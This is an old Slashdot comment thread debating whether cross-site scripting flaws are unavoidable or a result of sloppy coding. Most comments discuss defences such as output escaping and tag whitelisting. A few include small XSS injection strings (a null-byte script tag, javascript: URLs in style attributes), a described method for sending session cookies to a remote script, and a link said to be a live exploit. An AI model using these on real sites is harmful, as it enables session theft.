
XSS Vulnerabilities Reviewed and Re-Classified 142

Posted by CowboyNeal
from the breaking-and-entering dept.
An anonymous reader writes "Security Analysts at NeoSmart Technologies have revisited the now-famous XSS-type security vulnerabilities and attempted to re-classify their status as a security vulnerability. The argument is that XSS vulnerabilities are not a mark of bad or insecure code but rather a nasty but unavoidable risk that's a part of JavaScript - and that even then, XSS 'vulnerable' sites are no less dangerous or vulnerable at heart." Are they unavoidable, or just a symptom of lazy coding, or both?
  • Well (Score:5, Funny)

    by twalicek (984403) <twalicek@gma i l . com> on Thursday June 22, 2006 @09:55PM (#15586765)
    Samy is still my hero.
  • A hole is a hole (Score:5, Insightful)

    by Watson Ladd (955755) on Thursday June 22, 2006 @09:56PM (#15586769)
    Saying that these holes don't matter because websites can't avoid them with the standard method of doing things is just plain wrong from a security standpoint. If you are dealing with sensitive data, secure it. If the standard way won't let you, don't do it the standard way.
    • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...
      • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...

        how many years does it take to learn properly using your/you're?

        • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...

          how many years does it take to learn properly using your/you're?

          Something about this reminds me of glass houses and stone throwing, but I just can't put my finger on it.

        • how many years does it take to learn properly using your/you're?

          Correction:

          how many years does it take to learn proper use of your/you're?
          • I've never been a fan of the / contraction except occasionally when used with "and" and "or" (i.e. and/or).

            New correction (including capitalization):

            How many years does it take to learn the proper use of "your" and "you're"?

            or even:

            How many years of learning does it take to properly use "your" and "you're"?
  • User Content (Score:5, Insightful)

    by agnokapathetic (982555) on Thursday June 22, 2006 @09:58PM (#15586771)
    As buzzwordy as Web 2.0 is, end-user content is rapidly becoming the majority of the visible end-user internet experience (e.g. Digg, MySpace, Facebook, etc.) With thousands/millions of users posting content, XSS filters become an arms race against the latest techniques, with Internet Explorer even rendering code like <scr\x00ipt></s\x00cript> as valid. Even when filters are put into place, all it takes is one XSS virus [bindshell.net] to take down an entire website.

    Even disabling Javascript altogether on websites with user content doesn't help: other methods can be used to steal cookies/sessions/user credentials. Flash attacks [cgisecurity.com] are becoming more and more common, and are near impossible to protect against. Users demand dynamic user-driven content, the companies comply; I'm just surprised this hasn't been more prevalent.

    --Joel
    Ajax Translator [parish.ath.cx]
    • Can't understand (Score:3, Insightful)

      by Vexorian (959249)

      Bulletin Boards have been effective against these issues for ages with bbcodes that use [] instead of <>. Also Wikipedia has excellent formatting features without letting users ever use an html tag by themselves.

      By simply turning > and < into &gt; and &lt; before displaying content that was influenced by user input you get rid of every single XSS risk. If users complain about it being too limited they should get their own site instead of depending on a blog/forum/whatever other thing.

      • Re:Can't understand (Score:5, Informative)

        by Mark Round (211258) on Friday June 23, 2006 @02:25AM (#15587752) Homepage
        "By simply turning > and < into &gt; and &lt; before displaying content that was influenced by user input you get rid of every single XSS risk"

        Rubbish. That's one of the most basic errors made when people start trying to filter out XSS. Suppose you have a form that takes a user's name and then uses it in a hidden field on the next page? You could quite easily do something like:

        UserName" style="background:url(javascript:alert('Getting rid of angled brackets won't help you here'))

        Not an angled bracket in there, yet on most systems that'll work and display a popup. Hence the reason it's really not that simple, and the parent post refers to "an arms race against the latest techniques".
          That is why you also turn " into &quot; when it's inside double quotes. This is the right solution, you just have to fine-tune it. It's not that hard, you just need to remember it every single time it should be done. It's the "remember" stuff that's hard.

          Include turning & into &amp;. Finally there's ' (&#039;) and you're done.

          Some languages have functions to do this for you [php.net]; you just need to call them.
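For illustration, here is the same complete escaping recipe (&, <, >, double and single quotes) done with Python's standard library; PHP's equivalent is htmlspecialchars(). A minimal sketch:

```python
from html import escape

# escape() rewrites & first, then < > " ' into entities, so user text
# can't break out of markup or out of a quoted attribute value.
payload = 'UserName" style="background:url(javascript:alert(1))'
print(escape(payload))
# → UserName&quot; style=&quot;background:url(javascript:alert(1))
```

The attribute-injection payload from the grandparent post comes out inert because the quotes are entity-encoded.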
          • Re:Can't understand (Score:5, Informative)

            by jani (4530) on Friday June 23, 2006 @04:53AM (#15588141) Homepage
            Yet even this can be too simplistic, since there may be other things happening in the background.

            The first book to deal with this properly that I ever saw was Innocent Code [thathost.com] by Sverre H. Huseby (ISBN 0-470-85744-7, Wiley).

            I recommend this not only to people new to web programming, but also to seasoned programmers. There's more than one time that I've heard people say "pfah, I know the pit traps, I don't need this book", and a few weeks later tell me that there were things there they hadn't thought about.

            The book is concise and to the point.

            Note: I'm not neutral about this book; I was one of the people who read through the book and commented on it before publishing time, and Sverre is one of my friends.
        • Heh. And what happened to escaping quote signs? It's not even a new thing that only the latest JavaScript expert hackers discovered, but something that's also been known in the SQL Injection world for a long long time. (Yes, you can use prepared statements instead too, but you can also just escape the quotes and apostrophes.) And I wouldn't be surprised if it also was a part of some ancient CGI exploit.

          Basically if there's an "arms race", then escaping quotes isn't much of a part of it. The problem was know
      • Re:Can't understand (Score:5, Informative)

        by piranha(jpl) (229201) on Friday June 23, 2006 @07:57AM (#15588602) Homepage

        As someone else has pointed out, that's a naïve and incorrect approach.

        HTML is a standard. BBcode is a whim. HTML wins for its ubiquity. BBcode gives you nothing.

        People that don't think they can effectively and safely include HTML content from untrusted sources are not viewing the problem in a formal way. Address the cause, not the symptom.

        The cause is not thinking of and treating your HTML input as structured data. Rather, you're thinking of it as a character stream. Textual substitutions are a sign of that line of thought.

        Your user's HTML content is a tree structure. Parse it. Then filter out all elements that are not in your allowed-elements list. Filter out all element attributes that are not in your allowed-attributes lists. Construct these lists by examining the HTML specification and considering the risks of each element or attribute.

        Take it a step further. For each attribute value that contains a URI, parse that URI using a formal grammar. Filter out all URI schemes ("http", "ftp", etc) that are not in your allowed-schemes list. Certain characters, like non-printables, should never occur in a URI directly—signal an exception to the user to inform them of their error. Don't just stop if you don't find anything wrong! Reconstruct the URI from its constituent parts and replace the original with your sanitized version.

        Likewise, formally parse all CSS code: in referenced external stylesheets, embedded stylesheets, and in style attributes. Filter out anything not explicitly allowed. Replace any URIs with the output of the same URI-sanitization function above. Reserialize the content. (This is hard; drop all CSS as a short-cut.)

        When you're done, you'll serialize the HTML document and transmit that to your clients. I guarantee that this will eliminate XSS problems stemming from Internet Explorer incorrectly interpreting malformed HTML, CSS, or URIs. There are other attack vectors; be careful of what you allow to be included inline with documents, or linked to. (Think Flash.)

        This is the correct solution, and most flexible to your users. It's not another idiosyncratic language to learn. It's the world standard for rich textual documents on the World Wide Web.

        Unfortunately, it requires work.
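A minimal sketch of that parse-then-whitelist approach, using only Python's standard library. The tag and attribute lists here are illustrative placeholders, not the full lists the comment says to derive from the HTML specification, and a production system would want a maintained sanitizer rather than this sketch:

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}
ALLOWED_ATTRS = {}  # e.g. {"a": {"href"}} once URI schemes are vetted too

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop disallowed elements' tags entirely
        allowed = ALLOWED_ATTRS.get(tag, set())
        kept = "".join(f' {k}="{escape(v or "")}"' for k, v in attrs if k in allowed)
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # all text content gets re-escaped

def sanitize(html_text):
    s = Sanitizer()
    s.feed(html_text)
    s.close()
    return "".join(s.out)

print(sanitize('<b onclick="evil()">hi</b><script>alert(1)</script>'))
# → <b>hi</b>alert(1)
# (the onclick attribute and the script tags are gone; the script body
#  survives only as inert, escaped text)
```

Note the reserialization step the comment insists on: output is rebuilt from the parsed tree, never copied through from the input.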

  • Crazy (Score:5, Insightful)

    by Bogtha (906264) on Thursday June 22, 2006 @09:59PM (#15586778)

    The argument is that XSS vulnerabilities are not a mark of bad or insecure code but rather a nasty but unavoidable risk that's a part of JavaScript

    Er, no. XSS attacks are caused by sloppy web application developers that fail to encode user-supplied data for output in the appropriate way, and by sloppy web developers that trust that whatever was submitted by a user was submitted by the user intentionally.

    Both of these factors have technical solutions that are 100% effective and have been well-known for years. The former has nothing specifically to do with JavaScript anyway, it's just that the holes are most often used to sneak JavaScript onto a page.

    This article is a total crock of shit. For instance when it says:

    It is of the utmost importance to note that a page that has an "XSS vulnerablity" is no more dangerous than visiting a random result generated by a Google search

    It's no more dangerous in terms of security for the client machine. If Hotmail has a security hole, it doesn't make it more likely that somebody will get onto your computer. But they can still read and delete your email, and send email from your account.

    Actually, I take that back, it is more dangerous in terms of security for the client machine. With tools like the NoScript Firefox extension, and the similar mechanisms other browsers have, many people disable JavaScript for the random websites found with Google, but enable them for websites they trust, like Hotmail. So if Hotmail has an XSS vulnerability, they will be executing malicious JavaScript even though they only intended to allow trusted JavaScript to be executed.

    This author seems to have no real clue about web security. I guess this is why Slashdot shouldn't link to random weblog entries.

    • I'd second this post. A forum I lurk on had a major XSS issue a few years ago: flash uploads were allowed, and a user found a way for his scripts to call home. He had the ability to embed flash on a page; then every time the flash displayed, it'd phone home and send him the login information/cookies of the user who'd displayed it.

      Long story short, he gave himself superadmin rights as a proof of concept and then told the dev of the forum software about the vulnerability.

      He could just as well have destr

    • XSS attacks are caused by sloppy web application developers that fail to encode user-supplied data for output in the appropriate way, and by sloppy web developers that trust that whatever was submitted by a user was submitted by the user intentionally.

      That's how XSS happens. But why does it happen?

      Because the website accepts raw HTML of some kind. And with raw HTML comes JavaScript. Forget about filtering it perfectly. Yahoo has tried for years on end and still the occasional JavaScript injection issue pops

      • I have trouble believing that bbcode or any other method is foolproof. It depends what you translate the bbcode into in your app. You may still introduce an issue. Perhaps user agents should allow you to disable features on pages using headers, etc. I could explicitly mark a page as not including javascript, etc. Obviously this wouldn't be foolproof either, but it would certainly help. If the browser isn't expecting javascript or embedded objects then it can safely ignore them. Maybe we should star
        • I have trouble believing that bbcode or any other method is foolproof. It depends what you translate the bbcode into in your app. You may still introduce an issue.

          Nobody said it was perfect. The first rule is to be paranoid. And yes, issues may always appear, but it would be with something you control. Not with something controlled by anybody out there, which expands the possibilities for mischief 1000-fold.

          Maybe we should start signing pages so that they don't display without a checksum, etc. [...] Raw xh

  • by madsheep (984404) on Thursday June 22, 2006 @10:00PM (#15586784) Homepage
    I think someone would be pretty hard pressed to convince me that XSS cannot be considered the earmark of bad or insecure coding in all or most cases. If anyone reads Full Disclosure, we all know that any given moron can spend 24 hours a day looking on every website to find some XSS bug in a page. Now just because XSS exists in a site does not make it insecure or poorly coded (the latter is arguable). However, when these XSS bugs exist on websites that use session cookies or have a login of some sort that allows users to take actions, post, edit things, etc., then it is a product of insecure and poor coding. The risk exists when something can be gained by a threat source by conducting an XSS attack. If a user can post something on Slashdot that sends over my Slashdot username and password or my session cookie (allowing them to jump in on Slashdot right now and post as me) then it is a security risk. Finding an XSS issue on a webpage such as the one on www.arin.net (see Full Disclosure) really doesn't do anything or represent a risk. It is more about what can be gained or done from the XSS attack. As a quick side note to this discussion: XSS is *VERY* easy to prevent. Much more so than SQL injection. Who knows, maybe these people will try and reclassify SQL injection as not being a problem either. Sanitizing user input by not allowing it, or for example converting < and > to &lt; and &gt; respectively, is pretty easy and will stop almost all of these attacks. There is no excuse for not being able to secure a page with such coding practices to protect your site and users.
    • Finding an XSS issue on a webpage such as the one on www.arin.net (see Full Disclosure) really doesn't do anything or represent a risk.

      So if someone visits a link to www.arin.net in good faith that it is a trusted website that wouldn't try to break into your machine, what happens when an XSS vulnerability on www.arin.net allows an attacker to redirect to a malicious site that harbours a remote exploit for Firefox, for example? I wouldn't call that "doesn't do anything or represent a risk".

    • or looking at where user input enters the page and restricting html to a limited number of tags. It's hard to think of all evil sequences. Thinking of what's good is simple.
    • XSS is *VERY* easy to prevent. Much more so than SQL injection.
      SQL injection is easy to prevent. Pass input through an escaping function or use parametrized queries.
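For example, with Python's built-in sqlite3 module (the table and data are invented for the sketch), a parametrized query binds hostile input as a value rather than splicing it into the SQL text:

```python
import sqlite3

# toy schema for the sketch
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("Alice",))

# Hostile input is bound as a value, never spliced into the SQL string,
# so it can't close the quote or smuggle in extra statements.
evil = "x'; DROP TABLE users; --"
rows = conn.execute("SELECT name FROM users WHERE name = ?", (evil,)).fetchall()
print(rows)  # → []  (no match, and the users table still exists)
```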
    • by Anonymous Coward
      XSS is *much* harder to prevent than SQL injection. Why? If you're a competent coder, you can secure the code on the server end properly. In order to prevent XSS, you need to know about parsing bugs in the *browser*.
      • The solution to this problem would appear to be to whitelist what is *allowed*, rather than filtering out what is not. If you only need a simple commenting system then only allow plain text, convert double line breaks to </p><p> and wrap the whole thing in <p> ... </p>

        This is made a lot more difficult with unicode/multibyte input, however.
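A sketch of that plain-text commenting scheme in Python (the function name is made up for the example; Python 3 strings sidestep the multibyte concern at this layer, though byte-oriented stacks still have to get decoding right first):

```python
from html import escape

def render_comment(text):
    # Escape everything first, then blank-line-separated chunks become
    # paragraphs; no user-supplied markup survives as markup.
    chunks = [c.strip() for c in escape(text).split("\n\n") if c.strip()]
    return "".join(f"<p>{c}</p>" for c in chunks)

print(render_comment("Hi <script>alert(1)</script>\n\nSecond paragraph"))
# → <p>Hi &lt;script&gt;alert(1)&lt;/script&gt;</p><p>Second paragraph</p>
```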
    • by masklinn (823351) <slashdot.org@mas k l inn.net> on Friday June 23, 2006 @02:55AM (#15587840)

      XSS is *VERY* easy to prevent. Much more so than SQL injection.

      Uh? SQL Injection is trivial to prevent, just escape your user-provided content (most languages do it automagically for you if you use prepared statements btw, and by "most languages" I mean to say "just about every language but PHP before mysqli_ and PDO")

      XSS, on the other hand, relies as much on your lack of escaping as on browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

      XSS is much harder to prevent than SQL Injection.

      Which does not mean that it should ever be classified as "unavoidable" (it's not) or less dangerous than SQLI (it can, in fact, be much worse)

      • SQL Injection is trivial to prevent, just escape your user-provided content [...]

        So is XSS. Just escape all HTML in user-provided content. Ah, but you don't want that, do you? You want your bold and italic tags. Would SQL injection still be trivial to prevent if you didn't escape it altogether and wanted for "some" SQL to pass through and some not?
      • >> XSS, on the other hand, relies as much on your lack of escaping as on browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

        I'm sorry, but if a developer is aware of this IE bug^H^H^Hfeature, then why can't he properly validate and encode tainted input in much the same way? Any arbitrary text will not execute from CSS, only JavaScript code will execute. And not only any JavaScript code, but code that is properly embedded for it to be recogniz
      • XSS, on the other hand, relies as much on your lack of escaping as on browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

        There's no reason to allow a user to inject their own CSS code into site content.

        Filter out all style definitions from user-provided content before sending it to the client for rendering.

        Better yet, use a whitelist approach. If you're going to display the user's name, don't accept anything other than letters and whitespace. If yo
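That kind of name whitelist is a one-liner in most languages. A Python sketch (the letters-and-whitespace rule is the comment's own, and would of course reject legitimate names containing hyphens or apostrophes):

```python
import re

def valid_name(name):
    # Accept only letters and whitespace; reject everything else outright.
    return re.fullmatch(r"[A-Za-z\s]+", name) is not None

print(valid_name("Alice Smith"))                                   # → True
print(valid_name('UserName" style="background:url(javascript:)'))  # → False
```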
  • Yes, unavoidable. (Score:4, Informative)

    by Spazmania (174582) on Thursday June 22, 2006 @10:03PM (#15586795) Homepage
    Back in the 1980s BBS days, I wrote a terminal emulator for the Commodore 64 that would allow a BBS to enhance the user's experience by downloading and running short assembly programs. Users of any standard BBS software could even post such programs to the message boards for other users to enjoy.

    JMP 64738 (system reset) was the unavoidable result. The next version of the software recognized that the functionality could not be secured and removed it.
    • Re:Yes, unavoidable. (Score:4, Informative)

      by LordLucless (582312) on Thursday June 22, 2006 @10:58PM (#15587033)
      There's a difference between that example and XSS attacks on a website.

      In your example, the BBS was expecting code. It couldn't verify which code was good, and which code was bad, so it created an insecurity. On a website, the site expects textual content. It doesn't expect code. As long as you escape all user input properly, there's no chance of an XSS vulnerability. If you setup a website that allowed random users to upload javascript to be run on the site (rather than simply display the code as content) then that would be analogous to your BBS situation.
      • Re:Yes, unavoidable. (Score:4, Interesting)

        by Spazmania (174582) on Thursday June 22, 2006 @11:29PM (#15587143) Homepage
        I should hope there are differences between my situation and XSS attacks. They're separated by the better part of two decades of advances in computing.

        Nevertheless, many of the fundamentals were similar:

        1. The client (terminal emulator) allowed the server (BBS) to download and run code.
        2. A BBS expecting a post (text message) received machine code from a user instead.
        3. The BBS sent that code to the next viewer expecting a text message.
        4. The viewer performed undesired and unauthorized actions as a result.

        The biggest difference is that today's crop of programmers keep insisting they'll find a way to secure the scripting functionality, while I gave it up as a bad idea right away.
        • I think you're missing what I'm saying.

          With the BBS situation, you created a tool that allowed people to distribute executable code via BBS. The BBS was designed for content, not executable code. Allowing it to distribute code made it insecure.

          These websites are designed for distributing content, the same as your bog-standard BBS. People upload content, website displays it. All that is needed to secure it, is to get it to treat code as text, rather than as code. In terms of HTML, that's easy. Just run a
          • Re:Yes, unavoidable. (Score:3, Informative)

            by Spazmania (174582)
            These websites are designed for distributing content, the same as your bog-standard BBS. People upload content, website displays it. All that is needed to secure it, is to get it to treat code as text, rather than as code. In terms of HTML, that's easy. Just run a regexp on all user-supplied data to convert < to &lt;, and the content will be treated as text.

            Yeah, I got that. The same argument could have been made about my software: all BBSes could have been programmed to recognize the text escape sequences th
            • Did that make the BBSes insecure? I say baloney. The BBSes weren't the problem. The problem was that my software would accept such text and render it as machine code.

              I'd say it did make the BBSes insecure. The BBSes were vulnerable to an attack made by a malicious user. That attack may not have been in sufficiently common usage to make it a concern, but it is a flaw. Writing an online application and expecting users to "just behave" is naive in the extreme today. Never trust that the user will give you
            • Did that make the BBSes insecure? I say baloney. The BBSes weren't the problem. The problem was that my software would accept such text and render it as machine code.

              Ho ho ho. And where did your software live? On the BBS. The problem was that your software had a classical security flaw: code injection. No matter what the code was. The software had a hole and in my book that makes the server it runs on "bad", as in "does bad things to users". So while the server itself wouldn't be compromised, was it desirab

              • And where did your software live? On the BBS.

                Incorrect. I believe I made it very clear that my software was the client-side terminal emulator. It required and used no special software on the server/BBS side. Like Javascript, it was intentionally designed to do all its work on the client-side so that no change was needed on the BBS.

                Browsers are meant to run JavaScript.

                And my terminal emulator was meant to run machine code. So what? Since when is it the server's responsibility to accommodate client-side featu
          • In terms of HTML, that's easy. Just run a regexp on all user-supplied data to convert < to &lt;, and the content will be treated as text.

            That’s true, but unfortunately it’s not as simple as that—most web-based bulletin-board software wants to allow the user to use lots of emphasis. I agree that it’s still not very hard to secure—but it’s easy to see how people get it wrong...

            • Yep, particularly when people start using javascript event handlers in otherwise harmless tags. That's why I think a lot of sites use bbCode type stuff - [b] instead of <b>. Just filter out all HTML tags, then convert bbCodes to HTML.
      • As long as you escape all user input properly, there's no chance of an XSS vulnerability.

        Define "escape all user input properly"

        • Take anything that can be interpreted as browser-executable code, and transform it into something that ain't.
        • Define "escape all user input properly"

          only allow generation of html that you know is sane, DO NOT let anything unrecognised go through.

          if you're just interested in text you can do this as a simple replace operation: < becomes &lt;, & becomes &amp;

          if you want to offer formatting you have to parse the input and generate known safe html from it. You must also use appropriate sanitisation methods (e.g. make sure users can't embed extra quotes in a quote-delimited string) for anything you pass f
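One detail of that simple replace operation worth spelling out: & has to be handled first, or the entities the other replacements just wrote get mangled. A Python sketch:

```python
def escape_text(s):
    # & goes first: doing it later would rewrite the & inside the
    # freshly produced &lt; and &gt; into &amp;lt; and &amp;gt;.
    return (s.replace("&", "&amp;")
             .replace("<", "&lt;")
             .replace(">", "&gt;")
             .replace('"', "&quot;"))

print(escape_text('<a href="x">'))  # → &lt;a href=&quot;x&quot;&gt;
```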
  • by dkleinsc (563838) on Thursday June 22, 2006 @10:06PM (#15586805) Homepage
    XSS is not the problem. JavaScript is (just for the record, at NeoSmart we feel JavaScript is more of a headache than it is a life-saver..), and XSS is but a result of the (many) inherent security holes in JavaScript and not in the package itself!

    That quote really says it all. The basic argument seems to be very simple: Javascript Sucks, Ergo XSS Vulnerabilities are inevitable. That's about as accurate as saying that if Chewbacca lives on Endor, you must acquit.

    As someone who's had to wrangle plenty of Javascript, I agree that it sucks, but I disagree with any argument that security vulnerabilities are inevitable. These days, they seem to be more a product of adding features without thinking about the security implications (Hey, let's allow email viewed in Outlook to run scripts!) than poor implementations of those ideas. Although implementation problems play a part: You're busy coding the nifty new feature, you get to a point where it works, and you happily go and check it into CVS oblivious to the buffer overflow you've introduced.

    Fundamentally, there's no such thing as a computer error, only a series of human errors buried deeply enough that they appear to be a computer error (with one exception, that of the expected hardware failure).
    • As someone who's had to wrangle plenty of Javascript, I agree that it sucks, but I disagree with any argument that security vulnerabilities are inevitable. These days, they seem to be more a product of adding features without thinking about the security implications (Hey, let's allow email viewed in Outlook to run scripts!) than poor implementations of those ideas. Although implementation problems play a part: You're busy coding the nifty new feature, you get to a point where it works, and you happily go a

  • First language (Score:5, Insightful)

    by ptaff (165113) on Thursday June 22, 2006 @10:24PM (#15586874) Homepage
    Are they unavoidable, or just a symptom of lazy coding, or both?

    I wouldn't say lazy, but naive. Lots of people now cut their teeth at programming with HTML/Javascript and a simple server-side scripting language, like PHP or ASP. For a reason unknown, these simple languages (PHP especially [develix.com]) try to create a blanket so thick around the coder that most of them don't even think about validating input.

    Crap like auto-string escaping, crap like automagic global variables, crap like easy access to eval(), auto variable casting, these help when learning to program so you can concentrate on the task at hand, but become a big fat no-no when deploying stuff in a networked environment.

    Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.

    • Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.
      You didn't open source your programs?! And you consider that to be good?! What are you doing at Slashdot?!

      Let your work free! I even publish all my grocery lists under a Creative Commons license for all to enjoy! Because /. tells me to!
    • Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.
      And how is that relevant? This is the Web, bad code in one place can now affect a lot of people. All the more reason to pay attention.
  • by NerdENerd (660369) on Thursday June 22, 2006 @10:25PM (#15586883)
    I work for a bank. A hacker found one page in the Internet banking system that echoed a value from a form into an error message. They then used this to inject some JavaScript which gathered user logons. They managed to accumulate about $70,000 of fools' money into a holding account before they were caught. I don't feel particularly sorry for fools who fall for phishing scams, but it was still a security hole in the web application that could simply have been avoided by encoding values before echoing them to the page. Since then all code is audited for SQL injection and XSS by an external company before being released to production.
    XSS is a real security threat.
  • by Snowhare (263311) on Thursday June 22, 2006 @10:30PM (#15586899) Homepage
    XSS is not unavoidable and it is a security vulnerability. Slashdot has a cookie based login system. This means that if there is an XSS vulnerability in Slashdot I can cause any action a logged in user (maybe, Commander Taco?) can cause by doing something as simple as tricking them into loading a web page with an 'invisible' 1 pixel tall frame exploiting the XSS. Saying XSS isn't a security vulnerability is like claiming that leaving your house keys under the doormat isn't a security vulnerability.
    • ...if there is an XSS vulnerability in Slashdot I can cause any action a logged in user...
      You don't need XSS [tinyurl.com] for that. :-)
    • ...loading a web page with an 'invisible' 1 pixel tall frame exploiting the XSS...
      Firefox and IE both evaluate scripting in hidden iframes. Just set the CSS to "display:none" and not a single pixel of the frame will be visible anywhere on the page. Although I really don't see why you would want to hide the frame very badly anyway.
  • Is it just me (Score:1, Interesting)

    by Anonymous Coward
    Is it just me or did this article not make sense? The information is not presented logically, and it seems to contradict itself. It is vague about details. Is Javascript the problem, or is it XSS, or is it bad users, or is it site owners, or hackers exploiting XSS? I still don't know.
  • Not me! (Score:2, Funny)

    by fuzzyfozzie (978329)
    I use VBScript, so I guess I'm safe.
  • by Ant P. (974313) on Thursday June 22, 2006 @10:47PM (#15586972) Homepage
    Are they unavoidable, or just a symptom of lazy coding, or both?

    Both, in different amounts depending on which scripting language you use.

    It's impossible to write perfect software - not even NASA can do that.
    On the other hand the languages aren't much help. PHP for instance allows you to do stupid things with user input variables. Depending on how your scripts work, you can see no errors for months and then all of a sudden half your database or site gets deleted. Great fun, that.
  • Unavoidable? (Score:3, Informative)

    by radical_dementia (922403) on Thursday June 22, 2006 @10:53PM (#15587010) Journal
    Perhaps the author is unaware of the PHP function strip_tags. Or in a more general sense, a simple regular expression can be used to remove script tags or all HTML tags from a string. That's seriously all you need to do to eliminate XSS. The only times when XSS holes exist are when lazy or oblivious coders forget to call the function on any input passed to a script.

As far as the seriousness of XSS, I think the author is heavily downplaying the issue. With XMLHttpRequest it is easier than ever to use XSS to hijack users' sessions. For example, in a messageboard post or something I could put a simple script that uses an XMLHttpRequest object to send the user's cookies with the session id to a remote script. The script can then immediately hijack the user's session and steal information or whatnot, before the user even navigates to a different page.
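The sanitization step the parent (and the strip_tags suggestion above) describes can be sketched in a few lines. This is a minimal illustration, not any framework's API; the function name is my own:

```javascript
// Minimal HTML-escaping sketch: encode user-supplied strings before
// interpolating them into a page, so a <script> payload renders as
// inert text instead of executing in the victim's browser.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must run first, or later entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// A classic cookie-stealing payload becomes harmless markup-as-text:
const payload = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>';
console.log(escapeHtml(payload));
```

Note the ordering: ampersands have to be escaped before anything else, or the entities produced by the later replacements would themselves get mangled.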
    • by The MAZZTer (911996) <megazzt@nOSpam.gmail.com> on Thursday June 22, 2006 @11:13PM (#15587087) Homepage

If I recall correctly, samy exploited MySpace (there's a link somewhere above if you never heard about it) by taking advantage of the fact that IE6 will execute javascript: URLs in CSS url() attributes, i.e. something like this:

background-image: url(javascript:codehere)

Something like that at least. And of course if you allow HTML tags with attributes, anyone could stick a style="" on it and inject some javascript... in theory anyways.

      I read somewhere, and I agree, that the best solution is to strip ALL HTML and use your own tag set (most web forums are way ahead in this department). If you do insist on allowing a subset of HTML, use whitelists to define allowed tags and attributes etc, instead of blacklists... because with a whitelist, if you leave something out, oh well someone can't use a tag they should be able to, it's more restrictive than it should be, they file a bug report and it's fixed. With a blacklist if you leave something out, it's a potential security hole.
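The parent's whitelist idea can be sketched roughly like this. It's an illustrative toy, not production code (real HTML needs a proper parser, not a regex), and all names are my own:

```javascript
// Whitelist-style tag filter sketch: anything not on the allow list is
// dropped rather than passed through, so a forgotten tag fails closed
// instead of becoming a security hole (the blacklist failure mode).
const ALLOWED = new Set(["b", "i", "em", "strong"]);

function filterHtml(input) {
  return input.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g, (tag, name) => {
    if (!ALLOWED.has(name.toLowerCase())) {
      return ""; // drop disallowed tags entirely
    }
    // Re-emit allowed tags with no attributes, killing style=""/onerror="" injection.
    return tag.startsWith("</") ? `</${name.toLowerCase()}>` : `<${name.toLowerCase()}>`;
  });
}

console.log(filterHtml('<b style="x:expression(evil())">hi</b><script>alert(1)</script>'));
// -> <b>hi</b>alert(1)
```

The key property is the one the parent describes: leaving a tag out of the whitelist inconveniences a user, while leaving a tag out of a blacklist hands an attacker a vector.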

  • by neuroxmurf (314717) on Thursday June 22, 2006 @11:10PM (#15587078)
    If you allow local execution of code provided by untrusted remote sites, you have no security and never have, no matter how much the vendor assures you their "sandbox" is safe. XSS is not the security hole, it's just the latest batch of holes in the entire concept of client-side scripting.
  • Huh? (Score:3, Insightful)

    by GT_Alias (551463) on Thursday June 22, 2006 @11:46PM (#15587212)
Buffer overflows are an inescapable symptom, C is the real problem. Car accidents aren't the problem... steering wheels are.

    Maybe the people writing web apps need better training? No matter how safe you make the language, there will be people using it who are inexperienced, unfamiliar, or otherwise uneducated about the nuances of paranoid programming. It's very narrow-sighted to blame the tool.
  • Really? (Score:5, Interesting)

    by NerdENerd (660369) on Thursday June 22, 2006 @11:51PM (#15587226)
    Click on this link for an example against CitiBank
    CitiBank Exploit [citibank.com]
    • That's good. Better looking than most phishing emails I get. Even Slashdot reports the domain as [citibank.com]

Can you make it work with https?
  • Most at risk (Score:2, Insightful)

    by Joebert (946227)
Advertisers are the ones who are affected the worst by this.

    Banks & things like that are insured against loss, Federally in the case of banks.
    Advertisers who pay for people to click things on the other hand, are not.

I'd bet CowboyNeal's left nut there's thousands of dollars a day being scammed from advertisers through the use of XSS clicking adverts in the background, or changing the target address of an ad banner.
That's like saying buffer overflows are a nasty unavoidable side effect of using C. They're exploits in the practical world, plain and simple. Caused by poor coding? Yes. Likely due to language deficiencies? Absolutely. Unavoidable? No, not really.
  • Complete Twit (Score:1, Insightful)

    by Anonymous Coward
    Read some of the other guy's articles, he's a complete twit. The best is the one on how javascript should be dead and replaced with VBScript, and how Firefox is "against" Javascript, and how javascript was "almost dead" until Gmail came around.

Probably a 15 year old kid. It's a fucking wordpress site w/ the default theme. I mean, come on, seriously.
  • It's perfectly possible using simple hashing techniques to totally avoid XSS attacks.
As many of you know, Bruce Schneier has been pushing for new law to make software developers liable for defects, regardless of warranty disclaimers. While I don't dispute his analysis of the situation from a short-term security standpoint, I think the liability he wants would be a disaster for self-employed software developers and the free/open-source software movement in general, and I think such a law is unnecessary in the long run (remember that the software industry is still in its infancy).

    That s

  • by mrkitty (584915) on Friday June 23, 2006 @01:01AM (#15587473) Homepage
    Once again if you're curious what XSS is check out

    The Cross Site Scripting FAQ [cgisecurity.com]
  • I won't even comment on the security risk issue; though it takes a bit of social engineering, XSS can easily be leveraged for everything from session hijacking to plain old phishing.

